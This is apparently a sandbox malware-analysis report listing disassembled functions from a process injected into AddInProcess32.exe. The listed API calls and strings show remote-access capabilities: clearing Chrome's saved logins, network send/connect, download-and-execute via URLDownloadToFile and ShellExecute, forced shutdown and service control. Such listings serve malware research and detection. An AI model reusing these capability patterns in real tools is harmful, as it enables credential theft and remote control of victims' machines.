                                                                                                        • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                        APIs
                                                                                                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                        • API String ID: 2127411465-314212984
                                                                                                        • Opcode ID: 6a6134eaba03f115680d8d2eb42cf80636db46aabc3f1259ea9bdfec89823a6a
                                                                                                        • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                        • Opcode Fuzzy Hash: 6a6134eaba03f115680d8d2eb42cf80636db46aabc3f1259ea9bdfec89823a6a
                                                                                                        • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                        APIs
                                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                        • GetLastError.KERNEL32 ref: 0040B261
                                                                                                        Strings
                                                                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                        • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                        • UserProfile, xrefs: 0040B227
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                        • API String ID: 2018770650-1062637481
                                                                                                        • Opcode ID: a2128c42762ca10650babd8ab1cfb8cacd5f3b7577b82760db2916a4dab099ee
                                                                                                        • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                        • Opcode Fuzzy Hash: a2128c42762ca10650babd8ab1cfb8cacd5f3b7577b82760db2916a4dab099ee
                                                                                                        • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                        • GetLastError.KERNEL32 ref: 00416B02
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                        • API String ID: 3534403312-3733053543
                                                                                                        • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                        • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                        • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                        • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                        APIs
                                                                                                        • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                          • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                          • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                          • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                          • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 4043647387-0
                                                                                                        • Opcode ID: e6d26fc3e43131747f23564c7bb6c2c23fda576562a32a53d96f0f7b65159877
                                                                                                        • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                        • Opcode Fuzzy Hash: e6d26fc3e43131747f23564c7bb6c2c23fda576562a32a53d96f0f7b65159877
                                                                                                        • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                        • String ID:
                                                                                                        • API String ID: 276877138-0
                                                                                                        • Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                        • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                        • Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                        • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                        APIs
                                                                                                          • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                          • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                          • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                          • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                          • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                        • String ID: PowrProf.dll$SetSuspendState
                                                                                                        • API String ID: 1589313981-1420736420
                                                                                                        • Opcode ID: 7adedae087191cdbb87074b96bc09b469b6d5cbd4a3edd008392af3fdf127515
                                                                                                        • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                        • Opcode Fuzzy Hash: 7adedae087191cdbb87074b96bc09b469b6d5cbd4a3edd008392af3fdf127515
                                                                                                        • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                                        • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 2299586839-711371036
                                                                                                        • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                        • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                        • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                        • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                        • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                        • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                        • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                        • String ID: SETTINGS
                                                                                                        • API String ID: 3473537107-594951305
                                                                                                        • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                        • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                        • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                        • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                        APIs
                                                                                                        • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                                                                        • String ID:
• API String ID: 1157919129-0
• Opcode ID: 6a2d412744edee45f0d860d0441e360fba5e5849462073823f699ecb6cc56ff2
• Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
• Opcode Fuzzy Hash: 6a2d412744edee45f0d860d0441e360fba5e5849462073823f699ecb6cc56ff2
• Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
• WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
• WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
• _free.LIBCMT ref: 00448067
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 00448233
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 1286116820-0
• Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
• Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
• Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
• Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
• API String ID: 2825088817-2881483049
• Opcode ID: 987d970d9b7ebc5844ce0f49172f527790acb3a99b69c5f6248a1dc45aa8f3ed
• Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
• Opcode Fuzzy Hash: 987d970d9b7ebc5844ce0f49172f527790acb3a99b69c5f6248a1dc45aa8f3ed
• Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: FileFind$FirstNextsend
• String ID: x@G$x@G
• API String ID: 4113138495-3390264752
• Opcode ID: 9e42d4624aa1081e31404d699729e015607263420c2313147d1fc57e1445648b
• Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
• Opcode Fuzzy Hash: 9e42d4624aa1081e31404d699729e015607263420c2313147d1fc57e1445648b
• Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
  • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
  • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
• Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
• Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
• Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
• Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
• _wcschr.LIBVCRUNTIME ref: 00450BF1
• _wcschr.LIBVCRUNTIME ref: 00450BFF
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
• Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
• Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
• Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
• Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
APIs
• __EH_prolog.LIBCMT ref: 00408DAC
• FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
• FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: FileFind$FirstH_prologNext
• String ID:
• API String ID: 301083792-0
• Opcode ID: 0b43960f9993051d9431381d87604967d53f88331668a9e606d8c6ddd84d18a2
• Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
• Opcode Fuzzy Hash: 0b43960f9993051d9431381d87604967d53f88331668a9e606d8c6ddd84d18a2
• Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
• Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
• Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
• Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
• Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
• Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
• Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
• Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
APIs
• GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
• TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
• ExitProcess.KERNEL32 ref: 0044258E
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
• Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
• Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
• Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
• Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
• Opcode Fuzzy Hash: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
• Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: <D
• API String ID: 1084509184-3866323178
• Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
• Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
• Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
• Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                        • String ID: <D
                                                                                                        • API String ID: 1084509184-3866323178
                                                                                                        • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                        • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
